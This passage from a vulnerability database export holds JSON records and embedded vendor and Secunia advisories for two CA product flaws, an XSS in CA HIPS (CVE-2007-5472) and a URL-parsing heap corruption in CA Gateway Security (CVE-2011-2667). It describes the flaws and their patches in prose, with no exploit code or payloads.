"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200710-0051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "lte",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "host-based intrusion prevention system",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.0.0.93"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8"
},
{
"model": "associates host-based intrusion prevention system",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.093"
}
],
"sources": [
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:host-based_intrusion_prevention_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "David Maciejak\u203b david.maciejak@kyxar.fr",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
],
"trust": 0.6
},
"cve": "CVE-2007-5472",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2007-5472",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-28834",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2007-5472",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200710-426",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-28834",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the Server component in CA Host-Based Intrusion Prevention System (HIPS) before 8.0.0.93 allows remote attackers to inject arbitrary web script or HTML via requests that are written to logs for later display in the log viewer. \nAttacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. \nThis issue affects versions of CA HIPS prior to 8.0.0.93. CA-based host intrusion detection system (HIPS) combines independent firewall, intrusion detection and defense capabilities to provide active centralized threat defense. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,700 different Windows applications. \n\nInput passed in certain requests to the server is not properly\nsanitised before being logged. \n\nThe vulnerability is reported in versions prior to 8.0.0.93. \n\nSOLUTION:\nApply patches. \nhttp://supportconnect.ca.com/sc/redir.jsp?reqPage=search\u0026searchID=QO91494\n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits David Maciejak. \n\nORIGINAL ADVISORY:\nhttp://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: [CAID 35754]: CA Host-Based Intrusion Prevention System \n(CA HIPS) Server Vulnerability\n\nCA Vuln ID (CAID): 35754\n\nCA Advisory Date: 2007-10-18\n\nReported By: David Maciejak\n\nImpact: A remote attacker can take unauthorized administrative \naction. The \nvulnerability, CVE-2007-5472, occurs due to raw request data being \ndisplayed in the log when viewed by a browser. Note: The client \ninstallation is not vulnerable. \n\nMitigating Factors: The client installation is not vulnerable. \n\nSeverity: CA has given these vulnerabilities a maximum risk rating \nof Medium. \n\nAffected Products:\nCA Host-Based Intrusion Prevention System (CA HIPS) r8\n\nAffected Platforms:\nWindows\n\nStatus and Recommendation:\nCA has issued the following patch to address the vulnerabilities. \nCA Host-Based Intrusion Prevention System (CA HIPS) r8: QO91494\n\nHow to determine if you are affected:\n1. Log in to the HIPS Administration Console. \n2. Scroll down to the end of the Main page. \n3. Press the \"About\" link on the right bottom side of the page. \n4. Check the version. If the version is less than 8.0.0.93, the \n installation is vulnerable. \n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nSecurity Notice for CA Host-Based Intrusion Prevention System \n(CA HIPS) Server\nhttp://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp\nSolution Document Reference APARs:\nQO91494\nCA Security Advisor posting:\nCA Host-Based Intrusion Prevention System (CA HIPS) Server \nVulnerability\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=158327\nCA Vuln ID (CAID): 35754\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35754\nReported By: \nDavid Maciejak\nCVE References:\nCVE-2007-5472 - log content injection\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5472\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFHGLWAeSWR3+KUGYURAlHTAJ9Wee7boFMoFj8p/dsrJl7YbkWmvQCbBeJ0\nYlGWH5DdYWfAT3nGzaxImnk=\n=bkku\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-28834",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-5472",
"trust": 2.9
},
{
"db": "BID",
"id": "26134",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "27301",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2007-3547",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1018839",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "37998",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "60283",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-28834",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "60238",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"id": "VAR-200710-0051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T14:06:43.119000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Notice for CA Host-Based Intrusion Prevention System (CA HIPS) Server",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp"
},
{
"title": "CA Host-based intrusion detection system server HTML Fixes for code injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=147099"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/26134"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/482536/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://osvdb.org/37998"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1018839"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/27301"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2007/3547"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37285"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5472"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-5472"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/482536"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/27301/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16198/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo91494"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5472"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35754"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=158327"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-10-22T00:00:00",
"db": "VULHUB",
"id": "VHN-28834"
},
{
"date": "2007-10-18T00:00:00",
"db": "BID",
"id": "26134"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"date": "2007-10-22T18:39:08",
"db": "PACKETSTORM",
"id": "60238"
},
{
"date": "2007-10-22T22:50:26",
"db": "PACKETSTORM",
"id": "60283"
},
{
"date": "2007-10-22T19:46:00",
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"date": "2007-10-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "VULHUB",
"id": "VHN-28834"
},
{
"date": "2007-10-19T19:47:00",
"db": "BID",
"id": "26134"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"date": "2021-04-09T16:52:36.850000",
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"date": "2021-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA HIPS of Server Component cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
],
"trust": 0.6
}
}
VAR-201107-0229
Vulnerability from variot - Updated: 2023-12-18 13:57Icihttp.exe in CA Gateway Security for HTTP, as used in CA Gateway Security 8.1 before 8.1.0.69 and CA Total Defense r12, does not properly parse URLs, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and daemon crash) via a malformed request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Icihttp.exe module (CA Gateway Security for HTTP), which responds to incoming HTTP requests on port 8080. Due to a flawed copy-loop algorithm in the URL parsing routine, it is possible for a remote unauthenticated user to cause an exploitable heap corruption condition. This could result in the execution of arbitrary code under the context of the Gateway Security service. Computer Associates Total Defense and Gateway Security are prone to a remote code-execution vulnerability. Successfully exploiting this issue will allow attackers to execute arbitrary code with elevated privileges, completely compromising affected computers. Total Defense r12 and Gateway Security 8.1 are vulnerable; other versions may also be affected. CA has issued an update that resolves the vulnerability.
The vulnerability, CVE-2011-2667, occurs due to insufficient bounds checking that can result in a memory overwrite on the heap. By sending a malformed request, an attacker can overwrite a sensitive portion of heap memory, which can potentially result in server compromise. If the version displayed is less than 8.1.0.69, the installation is vulnerable.
Solution
Gateway Security r8.1: Apply fix RO32642
Alternatively, update to Gateway Security 9.0 available from the CA support site. (url line wraps) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782
Regards,
Kevin Kotas CA Product Vulnerability Response Team
-----BEGIN PGP SIGNATURE----- Version: PGP 8.1
iQEVAwUBTicU8pI1FvIeMomJAQHDpQgAlZ5TqT9B+I4zd20wzh8GhajqGb8BIuxo sCToQG5jq+kUX1QMnL+MVv4A0nR2o2P8cgxEhNtpEOyHnTeKvBuT//ALBpQgjYQ3 lMY3tRNrqEo1BAD9x/GqVp/xIBiaqkL80bt0BXmvxxhKblSX30mUA8D+v8P+DPrO eR+VEB7feWQ9LaqjIeEa5t8P5/TxuA+XNv0EdWtU7OAFc/IzXiu91XF++I+UJs3V l9Kvdj7x7JXyqZXc3943eUR/zqbxXO2/h/67Gj+N5ub1S4TBkPuoUMcPQ3o3l2WZ 75HcRT6AIHZ6shTbD20TCl1LUs4uKmJYc41kfbCEX3BsU12WbbV+zw== =w+9B -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. ----------------------------------------------------------------------
The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way.
Read more and request a free trial: http://secunia.com/products/corporate/vim/
TITLE: CA Gateway Security URL Parsing Vulnerability
SECUNIA ADVISORY ID: SA45332
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45332/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45332
RELEASE DATE: 2011-07-22
DISCUSS ADVISORY: http://secunia.com/advisories/45332/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/45332/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45332
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in CA Gateway Security, which can be exploited by malicious people to compromise a vulnerable system. This can be exploited to corrupt heap memory via specially crafted HTTP requests sent to TCP 8080.
The vulnerability is reported in versions prior to 8.1.0.69.
SOLUTION: Apply patch RO32642.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Andrea Micalizzi aka rgod via ZDI.
ORIGINAL ADVISORY: CA: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5E404992-6B58-4C44-A29D-027D05B6285D}
ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-237/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
-- Vendor Response: CA states: CA20110720-01: Security Notice for CA Gateway Security and Total Defense
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7b5E404992-6B58-4C44-A29D-027D05B6285D%7d
-- Disclosure Timeline: 2011-01-21 - Vulnerability reported to vendor 2011-07-20 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201107-0229",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gateway security",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "total defense",
"scope": "eq",
"trust": 1.4,
"vendor": "ca",
"version": "r12"
},
{
"model": "total defense",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r12"
},
{
"model": "gateway security",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8.1.0.69"
},
{
"model": "gateway security",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.1"
},
{
"model": "total defense suite",
"scope": null,
"trust": 0.7,
"vendor": "ca",
"version": null
},
{
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates gateway security",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-237"
},
{
"db": "BID",
"id": "48813"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004769"
},
{
